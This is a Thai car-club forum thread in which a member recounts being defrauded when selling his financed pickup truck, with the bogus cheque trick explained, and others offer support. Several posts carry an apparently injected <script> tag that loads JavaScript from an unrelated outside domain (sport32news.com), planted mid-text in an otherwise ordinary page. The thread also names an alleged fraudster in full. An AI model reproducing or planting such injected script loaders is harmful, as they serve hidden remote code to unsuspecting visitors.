ตอบ
BeMe

ชื่อเล่น: เอ๋

เข้าร่วม: 19 พฤษภาคม 2011
ตอบ: 582

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2030
ให้คำขอบคุณ: 954

ปี: 2005
อังคาร, 21 มิถุนา 2011 14:42 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
เรื่องจริงของชีวิตผมครับ

ปล. ขอบคุณพี่รัฐมากครับ ที่อุตสาห์โทรมาเล่าประสบการณ์ของพี่ให้ฟัง ขอบคุณจิงๆ พี่ มาระยองเจอกันได้ครับ อยากคุยด้วย

เมื่อ 4 ปีที่แล้ว (2007) ด้วยเหตุผลทางครอบครัว ทำให้ผมตัดสินใจออกรถคันหนึ่ง เป็น ISUZU Dmax Space CAB 2.5 สีเงิน ทะเบียน ตศ 7471 จากศูนย์ในระยอง ทั้งๆ ที่ผมไม่อยากออกมือ 1 เพราะเงินเดือนไม่พอ ผ่อนแล้วเหลือตังนิดเดียว แต่ก็เพราะเหตุผลที่ว่า ทำให้จำต้องออกรถใหม่

และที่สำคัญผมต้องส่งน้องเรียนมหาลัยด้วย และมีเหตุการณ์ที่เริ่มเป็นมรสุมชีวิตเข้ามาหลังจากออกรถมาได้เพียง 3 เดือน บริษัทที่ผมทำงานอยู่ต้อง Layoff พนักงานหลายร้อยคน และ 1 ในนั้นคือผม แต่ผมก็ยังโชคดีที่เจ้านายเก่าชวนไปทำงานที่ Office เขา ซึ่งเขาจะจ่ายเงินเดือนให้เท่าที่เดิม ซึ่งตอนนั้นผมคิดว่าดีกว่าตกงานอยู่แล้ว รีบรับทันที แต่เรื่องของเรื่องก็คือ ผมต้องย้ายไปอยู่เมืองทองฯ ที่นนท์ ซึ่งทำให้เงินที่เหลือน้อยอยู่แล้ว ไม่เพียงพอ เพราะจากอยู่บ้านตัวเอง ต้องไปเช่าห้องอยู่ อีกทั้งค่ากินค่าอยู่อีก ซึ่งทำให้เงินที่ต้องส่งน้องไม่พอ...

นี่คือจุดเริ่มต้นของเรื่อง...ผมต้องรีบขายรถคันนี้ให้ได้ภายในเดือนนั้น (ประมาณกรกฏาปีนั้น) ผมรีบลงประกาศขายรถในเวปขายรถหลายเวป และก็ทำให้มีหลายคนโทรเข้ามาสอบถาม เพราะเป็นรถใหม่ 5 เดือน เพิ่งวิ่งครบ 10000 โลไปเอง ใจผมอยากได้แค่เงินดาน์วคืนเท่านั้น แต่เต็นท์รถกดราคามาก ผมเลยยังไม่อยากปล่อย จะรอให้ถึงที่สุดก่อน

..แล้วก็มีคนคนหนึ่งโทรมา มันชื่อ "ไอ้หมู" ชื่อจริง "ผลายุทธ ผลหมู่" มันบอกว่าทำธุรกิจค้าเฟอร์นิเจอร์อยู่ เช่ารถเขาวิ่งส่งของอยู่ อยากได้รถสภาพดีๆ ไว้เอง เห็นรถผมยังเป็นรถใหม่อยู่ และยอมจ่ายเงินดาน์วที่ผมต้องการ นัดดูรถกัน มันก้อมาที่เมืองทองฯ ผมรอที่ออฟฟิส พอมาถึงมันก็โทหาผมว่าอยู่ตรงไหน จนได้เจอกัน แต่ที่น่าสงสัยคือ

- ทำไมเดินมา ซึ่งผมถามมันก็บอกว่า ให้เพื่อนมาส่ง จอดรออยู่ข้างหน้านู๊น ซึ่งไม่จำเป็นเลยว่าทำไมต้องจอดรอตั้งไกล ทั้งๆ ที่ควรจะขับมาดูก่อนว่ามีที่จอดใกล้หรือเปล่า
- แต่งตัวดี พูดจาดี ยกแม่น้ำทั้ง 5 มาอ้างความน่าเชื่อถิอ
- ไม่ลองรถ อ้างว่ารถยังใหม่ ไม่ต้องลองก็ได้ (คนจะซื้อรถผมว่าใหม่เก่าต้องลองหมดครับ) ซ้ำยังไม่เปิดประตูรถดูข้างในด้วยซ้ำ
- อ้างว่ายังไม่สามารถโอนรถได้ เพราะน้องสาวที่จะเป็นคนค้ำ ยังไม่กลับจากทำทัวร์ที่ลาว จะกลับสิ้นเดือน แต่พยายามบอกว่าอยากได้รถไปค้าขายก่อนยังไงทำสัญญาซื้อขายกันไว้ก่อนได้ไหม...ผมตกลงคับ อันนี้ไม่อยากแก้ตัวนะครับ แต่เพราะว่าผมเป็นคนง่ายๆ มองโลกในแง่ดี ไม่อคติกับใครก่อนครับ ยังคิดว่าเขาช่วยเรา เราช่วยเขาอยู่เลย... "ผมไม่คิดว่าจะเจออะไรแบบนี้กับชีวิตตัวเองครับ"

แล้วมันก็กลับไป.. นัดกันวันเสาร์ถัดมาว่าจะมาทำสัญญาซื้อขายกัน มันมาเหมือนเดิมครับ เดินมา... ผมสงสัย แต่ก็ไม่ถาม มันมาพร้อมเงินสด และหลักฐานอ้างอิง รวมทั้งตีเชคเป็นจำนวนเงินที่เหลือเพื่อให้ผมตายใจว่า ถ้ามันโกง ก็เอาเช็คไปแจ้งความจับมันได้เลยครับ และมันยังพาผมขับรถไปดูสถานที่อ้างอิงตัวเอง บุคคลปลอมๆ ที่มันจัดฉากขึ้น เพื่อความสมจริง..

แล้วผมก็รับเงิน..เซ็นสัญญากับมัน โดยนัดกันไว้ตอนสิ้นเดือนเมื่อน้องสาวที่มันอ้างกลับมา จะมาโอนรถกัน

และแล้วสิ้นเดือนผมโทรไปตามนัด มันเริ่มอ้าง "น้องสาวยังไม่กลับ" "น้องสาวไม่ยอมค้ำให้ ถ้ามันไม่คืนเงินที่มันยืมน้องเสียก่อน" "ทำธุรกิจขาดทุน" บลาๆๆๆๆ ทั้งหมด 5 เดือน แต่ถึงยังไงผลก็ยังคิดว่าผมไม่ได้โดนหลอก เพราะ 5 เดือนที่ผ่านมา มันยังโอนเงินค่างวดรถมาให้ผมจ่าย (แต่กว่าจะได้เงินแต่ละเดือนต้องทวงกันหลายครั้ง) เล่นเอาผมหัวเสีย บอกว่า ถ้าเดือนหน้ายังไม่โอนผมขอรถคืน มันบอกว่าได้ครับ แต่ยังไงถ้าผมขายได้แล้วมันขอเงินส่วนหนึ่งจากการขาย เพราะมันบอกว่ามันจ่ายให้ผมมา 5 เดือนแล้ว ผมก็บอกว่า อ้าวคุณเอารถไปใช้นี่ครับ มันก็เหมือนกันค่าเช่ารถไม่ใช่เหรอ แต่ผมไม่ได้อยากเอากลับ ผมแค่อยากให้คุณมาโอนรถกันให้จบเรื่อง หลังจากนั้นคุณจะไปขายเอาเงินคืนยังไงก็แล้วแต่คุณ...
และที่เดือนที่ 6 นั่นแหละเป็นครั้งสุดท้ายที่ผมได้คุยกับมัน ผมโทรไปทวงค่ารถอีก (เหมือนเดิม) มันรับบอกว่าตอนนี้มาขายของอยู่ทางใต้ เดี๋ยววันเสาร์จะโอนเงินให้...และแล้ววันเสาร์ผมก็โทรไป "ไม่สามารถติดต่อหมายเลขที่ท่านเรียก" ไม่เป็นไร รอก่อน เพราะผมเคยติดต่อมันไม่ได้ 3 วันมาก่อน แต่จนสิ้นสัปดาห์ ก็ยังติดต่อไม่ได้ ผมต้องยืมเงินเพื่อนจ่ายงวดรถไปก่อน ผมต้องชวนเพื่อนไปตามหาตามบ้านเลขที่ที่อยู่ในสำเนาทะเบียนบ้าน...และนี่คือข้อสรุปทั้งหมดของเรื่องนี้

1 ที่อยู่ของมันเป็นของจริงครับ แต่มันย้ายออกไปเป็นสิบปีแล้ว แต่มันยังใช้ที่อยู่เดิมเพราะมันไม่ได้ย้ายชื่อออกจากทะเบียนบ้าน และผมเพิ่งรู้ว่าเจ้าทุกข์หลายรายพาตำรวจมาที่นี่หลายครั้งแล้ว
2 รู้สึกโง่มากก.. แค่ Search ชื่อมันจาก Google ก็เจอชื่อมันหราแล้ว เพราะเจ้าทุกคนอื่นตามอยู่ครับ
3 มีแต่คนหวังเอาประโยชน์จากเราที่เดือดร้อน ทั้งๆ ที่เราเล่าให้เขาฟังว่าเกิดอะไรขึ้น ตั้งแต่นายไปรษณีย์ที่เราไปขอให้เขาช่วยบอกหน่อยได้ไหมว่าบ้านหลังนี้อยู่ไหน จะมาเรียกเก็บค่าบอกเรา, ทนายที่พ่อบอกว่ารู้จักๆ ก็มาพูดเรื่องค่าดำเนินการทั้งๆ ที่ยังไม่ได้ทำอะไรเลย
4 ตำรวจจะไม่ยอมตีเป็นคดีอาญา ทั้งๆ ที่เราเอาหมายศาลจากเจ้าทุกข์คนอื่น(ที่ตีเป็นคดีอาญา) มาแนบให้ดู อ้างว่า แล้วแต่เจ้าหน้าที่เขาพิจารณา ของเราไม่เกี่ยวกับของเขา แถมยังบอกเรานั่นแหละต้องโดนดำเนินคดี เพราะเอารถไฟแนนซ์ ไปซื้อขายกันเอง (อันนี้ผิดจริงครับ แต่ผมคุยกับไฟแนนซ์แล้ว ตรงๆ เขาก็ไม่เอาเรื่องกับผม เพราะตราบใดที่ผมยังจ่ายค่างวดเขาอยู่ก็ไม่มีปัญหา และยังยอมออกเอกสารเป็นเจ้าทุกข์ร่วมกับผมอีก) แต่ยังไงตำรวจก็ไม่รับ (ผมไปแจ้งถึง 4 สถานีครับ) เพราะคดีพวกนี้ได้ของคืนยาก และหากเขาปิดไม่ได้มันมีผลกับผลงานของเขา สุดยอดด...
5 ผมวุ่นหลายเรื่องมากกับเรื่องนี้ คิดอยากแจ้งความเท็จ ทำยังไงให้ประกันรับผิดชอบ... 3 เดือนทำงานแทบไม่ได้ ไม่มีอารมณ์ จนต้องตัดสินใจยอมจ่ายเอง แล้วหางานใหม่ ทำเอง แก้เอง
6 มีหลายคนแนะนำว่าปล่อยไปเลย รถไม่อยู่แล้ว ประกันจะยึดอะไรได้... ผมทำไม่ได้ครับ เพราะเพื่อนสนิทผมเป็นคนเซ็นต์ค้ำให้ ผมทำให้เขาเดือดร้อนไม่ได้ แล้วจะมีใครเชื่อถือผมอีก กับคนที่ทำให้เพื่อนเดือดร้อน... ผมคิดว่าผมทำถูกนะ การที่ผมยังสู้ กลับส่งผลดีให้ผมเพราะคนอื่นเห็นว่าผมไม่ใช่คนไร้ความรับผิดชอบครับ
7 ถึงอย่างนั้น ก็ยังเจ็บปวดทุกครั้งที่ต้องเดินเข้าเซเว่นตอนสิ้นเดือน นับเงินแบงค์พัน 12 ใบ แล้วยื่นให้พนักงาน
8 เหลืออีก 10 เดือนจะหมดแล้วครับ

ขอบคุณทุกคนที่อ่านนะครับ
ขอให้ประสบการณ์แย่ๆ ของผมได้เป็นภูมิคุ้มกันให้ชาว ES Group ทุกคนครับ

เพิ่มเติมครับเชคเงินสดที่มันให้มา ไม่มีประโยชน์อะไรเลยครับ
มีคนแนะนำให้ผมเอามันไปขึ้น ให้กลายเป็นเชคเด้ง แล้วค่อยเอาเชคไปแจ้งความ
ผมลองแล้ว และเพิ่งรู้ว่า ถ้าเชคเขียนอย่างนี้

ตัวหนังสือ หกแสนบาทถ้วน
ตัวเลข 600000.xx

ใช้ไม่ได้ครับ ผมไม่รู้คิดว่า .xx ไม่มีความหมาย
แต่ไม่ใช่ครับ พนักงานธนาคารบอกผมว่า .xx นั่นสามารถเป็นอะไรก็ได้ตั้งแต่ .00 - .99 ดังนั้น คนเขียนตั้งใจเขียนไม่ให้เชคใช้ได้ตั้งแต่แรกแล้ว ทางธนาคารไม่สามารถทำอะไรกับเชคที่เขียนไม่ถูกต้องได้

เผื่อสำหรับคนไม่รู้คับ ส่วนผมไม่รู้จิงๆ โดนไปแบบนี้รู้เลยว่าโลกนี้ยังกว้างอีกเยอะ

แก้ไขล่าสุดโดย เมื่อ ศุกร์, 24 มิถุนา 2011 00:06, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
BeMe

อังคาร, 21 มิถุนา 2011 14:52 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
คันนี้เลยครับ

คิดถึง รถคันแรก

Attached File :
กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
Attached File :
กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
tokykung

ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ปี: 2002
อังคาร, 21 มิถุนา 2011 14:52 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
ขอบคุณมากคร้บ และสู้ ๆ เป็นกำลังใจให้นะครับ....
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai 
BeMe

อังคาร, 21 มิถุนา 2011 14:54 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
tokykung พิมพ์ว่า:
ขอบคุณมากคร้บ และสู้ ๆ เป็นกำลังใจให้นะครับ....

ขอบคุณครับ
ได้รับคำขอบคุณจาก: wut-chiangmai  merscie 
Oo-kakachi-oO

ชื่อเล่น: จ๊อตครับ

เข้าร่วม: 02 มิถุนา 2010
ตอบ: 597

ได้รับคำขอบคุณ: 1013
ให้คำขอบคุณ: 814

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 21 มิถุนา 2011 15:05 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
หัวใจคุณหล่อมาก
.
ผมชอบประโยคที่ว่า ..."มีหลายคนแนะนำว่าปล่อยไปเลย รถไม่อยู่แล้ว ประกันจะยึดอะไรได้... ผมทำไม่ได้ครับ เพราะเพื่อนสนิทผมเป็นคนเซ็นต์ค้ำให้ ผมทำให้เขาเดือดร้อนไม่ได้ แล้วจะมีใครเชื่อถือผมอีก กับคนที่ทำให้เพื่อนเดือดร้อน..."
.
นี่ดิครับ ลูกผู้ชาย สู้ๆนะครับ โชคดีนะครับ
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai  b4i6  tueypp  Concept_ES  Ping4635513  es6363  Meemangkang  Gremlin  Kriss_es04  Surayut 
Edan

เข้าร่วม: 28 กรกฎา 2010
ตอบ: 197

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 451
ให้คำขอบคุณ: 376

ปี: 2004
อังคาร, 21 มิถุนา 2011 15:14 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สู้น่ะคับ สุดยอดมากที่ไม่ทำให้เพื่อนเดือร้อน ไงเป็นกำลังใจให้น่ะคับ ต้องมีวันเป็นของเราคับ
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai  es330  Meemangkang  Gremlin 
maxch

เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

อังคาร, 21 มิถุนา 2011 15:20 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สุ้ต่อไปครับ
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai  Meemangkang 
hacker

ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 21 มิถุนา 2011 15:22 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
พูดไม่ออก
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai 
Surpass

ชื่อเล่น: พงษ์

เข้าร่วม: 01 มีนา 2010
ตอบ: 2872

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 734
ให้คำขอบคุณ: 1559

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 21 มิถุนา 2011 15:22 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
เป็นกำลังใจให้คับ
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai  merscie  Meemangkang 
pooza191

ชื่อเล่น: ปู

เข้าร่วม: 01 ตุลา 2008
ตอบ: 257

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 334
ให้คำขอบคุณ: 215

ปี: 2001
อังคาร, 21 มิถุนา 2011 15:27 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
ได้รับคำขอบคุณจาก: BeMe  wut-chiangmai  merscie 
BeMe

อังคาร, 21 มิถุนา 2011 15:33 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
Oo-kakachi-oO พิมพ์ว่า:
.
ผมชอบประโยคที่ว่า ..."มีหลายคนแนะนำว่าปล่อยไปเลย รถไม่อยู่แล้ว ประกันจะยึดอะไรได้... ผมทำไม่ได้ครับ เพราะเพื่อนสนิทผมเป็นคนเซ็นต์ค้ำให้ ผมทำให้เขาเดือดร้อนไม่ได้ แล้วจะมีใครเชื่อถือผมอีก กับคนที่ทำให้เพื่อนเดือดร้อน..."
.
นี่ดิครับ ลูกผู้ชาย สู้ๆนะครับ โชคดีนะครับ

คิดงั้นจิงคับ ตอนไปขอให้เขาช่วย เราบอกให้เขาเชื่อใจเรา เขาก็ยอมช่วยย..

เพื่อนดีๆ มีค่ากว่าเยอะคับ

ขอบคุณครับผม
ได้รับคำขอบคุณจาก: hacker  wut-chiangmai  kittidech  battery3k  merscie  cacalot  tzm  Oo-kakachi-oO 
BeMe

อังคาร, 21 มิถุนา 2011 15:35 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
Edan พิมพ์ว่า:
สู้น่ะคับ สุดยอดมากที่ไม่ทำให้เพื่อนเดือร้อน ไงเป็นกำลังใจให้น่ะคับ ต้องมีวันเป็นของเราคับ

เพื่อนดีๆ มันหายากครับ
ได้รับคำขอบคุณจาก: wut-chiangmai  merscie 
catsteal

ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 21 มิถุนา 2011 15:40 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
Oo-kakachi-oO พิมพ์ว่า:
.
.

.ใช่คับ เพื่อนค้ำให้ไงก็ไม่ควรโยนขี้ให้เพื่อน
ได้รับคำขอบคุณจาก: wut-chiangmai  BeMe  merscie 
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 21 มิถุนา 2011 15:45 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สุดยอดมากครับ สมกับเป็นลูกผู้ชายจริงๆ

ผมเองก็ไม่เคยปล่อยให้ใครมาเดือดร้อยเพราะผมเช่นกัน ใจเขาใจเราครับ โกงไม่ลงจริงๆ คนอื่นไม่รู้ แต่ใจเราที่รู้ครับ

ปล. ชื่อ เอ๋ เหมือนกันครับ 555
ได้รับคำขอบคุณจาก: BeMe  es330  merscie 
DELL

ชื่อเล่น: หนุ่ม

เข้าร่วม: 12 ธันวา 2008
ตอบ: 2245

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1831
ให้คำขอบคุณ: 5795

สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 21 มิถุนา 2011 15:45 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
อ่านแล้วนึกไรไม่ออกเลยคับ สู้ๆๆๆๆๆๆนะคับ
ได้รับคำขอบคุณจาก: BeMe  merscie 
wut-chiangmai

ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

อังคาร, 21 มิถุนา 2011 16:00 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สุดยอดครับ นับถือความคิดเลยครับ

เป็นกำลังใจให้นะครับ

ดีใจที่ได้อยูบ้านหลังเดียวกันครับ
ได้รับคำขอบคุณจาก: BeMe  merscie 
Nut_Au_Together

ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 21 มิถุนา 2011 16:05 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
เป็นกำลังใจให้นะครับ สู้ ๆ
Juris

ชื่อเล่น: เม

ตอบ: 780

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1697
ให้คำขอบคุณ: 1333

สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 21 มิถุนา 2011 16:06 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
ลองร้องเรียนผ่านสื่อรึยังครับ หาพรรคพวกในวงการข่าวมาช่วยทำข่าว สน. นี้หน่อย มันไม่รับแจ้งความ พวกนี้มันกลัวเป็นข่าวครับ เพราะผู้กำกับเดือดร้อนแน่

สู้ๆ ครับ เป็นกำลังใจให้
ronnachai

ชื่อเล่น: เอฟ

เข้าร่วม: 03 กันยา 2010
ตอบ: 634

Guru ES
Guru ES

ได้รับคำขอบคุณ: 374
ให้คำขอบคุณ: 1480

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 21 มิถุนา 2011 16:29 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
เงยหน้าไม่อายฟ้า ก้มหน้าไม่อายดินครับ กับการกระทำอย่างคุณ ใครไม่รู้ เรารู้เอง

และขอบคุณสำหรับประสบการณ์ที่เป็นประโยชน์แก่พี่น้อง ES

sayarm

ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

อังคาร, 21 มิถุนา 2011 17:07 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สุดยอดลูกผู้ชายครับคุณเอ๋ ยังไงขอเป็นกำลังใจให้ครับ สู้ๆ

และขอบคุณกับการแชร์ประสบการณ์ให้ฟัง
Saka

ชื่อเล่น: ศักดิ์

ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

อังคาร, 21 มิถุนา 2011 17:17 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
มาเป็นกำลังใจให้อีกคน เห็นแล้วเสียดาย เพราะผมกำลังอยากได้รถกระบะแบบนี้พอดีเลย
ทุกวันนี้มันก็ใช้ชีิวิตไม่ได้มีความสุขหลอกครับ
หลบ ๆ ซ่อน ๆ ไปไหน ทำอะไร ก็ไม่สบายใจ
ซื่อกินไม่หมด คตกินไม่นาน
ได้รับคำขอบคุณจาก: BeMe  merscie  Meemangkang 
b4i6

เข้าร่วม: 20 พฤศจิกา 2010
ตอบ: 517

ได้รับคำขอบคุณ: 629
ให้คำขอบคุณ: 852

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 21 มิถุนา 2011 17:22 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน สู้ๆครับ
kim_possible

ชื่อเล่น: หนู

เข้าร่วม: 10 ตุลา 2008
ตอบ: 2677

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2006
ให้คำขอบคุณ: 6407

อังคาร, 21 มิถุนา 2011 17:46 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
เป็นกำลังใจให้ครับ
birdphoto

ชื่อเล่น: เบิร์ดจ้า

เข้าร่วม: 17 พฤษภาคม 2010
ตอบ: 568

ได้รับคำขอบคุณ: 564
ให้คำขอบคุณ: 154

สี: แดง ไฟร์เปปเปอร์ (R-507P)
อังคาร, 21 มิถุนา 2011 17:54 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
สุดยอดเลยพี่ใจพี่อดทนมาก สักวันมันจะดีคับพี่
ได้รับคำขอบคุณจาก: BeMe  merscie  Meemangkang 
BeMe

อังคาร, 21 มิถุนา 2011 17:57 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
bandai_join พิมพ์ว่า:
สุดยอดมากครับ สมกับเป็นลูกผู้ชายจริงๆ

ผมเองก็ไม่เคยปล่อยให้ใครมาเดือดร้อยเพราะผมเช่นกัน ใจเขาใจเราครับ โกงไม่ลงจริงๆ คนอื่นไม่รู้ แต่ใจเราที่รู้ครับ

ปล. ชื่อ เอ๋ เหมือนกันครับ 555

ขอบคุณมากคับ ยินดีที่รู้จักคนชื่อเดียวกันคับ
ได้รับคำขอบคุณจาก: merscie 
BeMe

อังคาร, 21 มิถุนา 2011 18:03 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
sayarm พิมพ์ว่า:
สุดยอดลูกผู้ชายครับคุณเอ๋ ยังไงขอเป็นกำลังใจให้ครับ สู้ๆ

และขอบคุณกับการแชร์ประสบการณ์ให้ฟัง

ก้อไม่ถึงขนาดนั้นคับพี่หยาม

จิงๆ เรื่องมันก้อนานมาแล้ว แต่ก้อคิดว่าจะเป็นประโยชน์กับใครได้บ้าง

เดี๋ยวคิดว่าผมหื่นเป็นอย่างเดียว 5555+ <script src="https://sport32news.com/civicesgroup.js"></
battery3k

เข้าร่วม: 09 ธันวา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 3414

อังคาร, 21 มิถุนา 2011 18:18 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
คนอย่างคุณไม่มีวันลำบากนานครับ
ผมเชื่ออย่างนั้น
ได้รับคำขอบคุณจาก: BeMe  teerayod  merscie  Meemangkang 
BeMe

อังคาร, 21 มิถุนา 2011 18:20 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
battery3k พิมพ์ว่า:
คนอย่างคุณไม่มีวันลำบากนานครับ
ผมเชื่ออย่างนั้น

ขอบคุณคับ
ก้อไม่นานเท่าไหร่คับ แค่ 7 วัน
จันทร์ - ศุกร์ <script src="https://sport32news.com/civicesgroup.js"></

ฮาซะงั้น
wichai

ชื่อเล่น: ป๊อป

เข้าร่วม: 26 มกรา 2011
ตอบ: 500

ได้รับคำขอบคุณ: 186
ให้คำขอบคุณ: 524

อังคาร, 21 มิถุนา 2011 18:22 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
BeMe พิมพ์ว่า:

จิงๆ เรื่องมันก้อนานมาแล้ว แต่ก้อคิดว่าจะเป็นประโยชน์กับใครได้บ้าง

เดี๋ยวคิดว่าผมหื่นเป็นอย่างเดียว 5555+ <script src="https://sport32news.com/civicesgroup.js"></
สุดยอดครับเป็นกำลังใจให้นะครับ
BeMe

อังคาร, 21 มิถุนา 2011 18:33 - กระทู้เตือนใจ ซื้อ/ขาย รถครับ ชีวิตจริงที่อาจเหมือนใครหลายคน
wichai พิมพ์ว่า:
BeMe พิมพ์ว่า:

สุดยอดครับเป็นกำลังใจให้นะครับ

ขอบคุณคับพี่ป๊อบ
ตอบ
หน้า 1 จาก 4
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.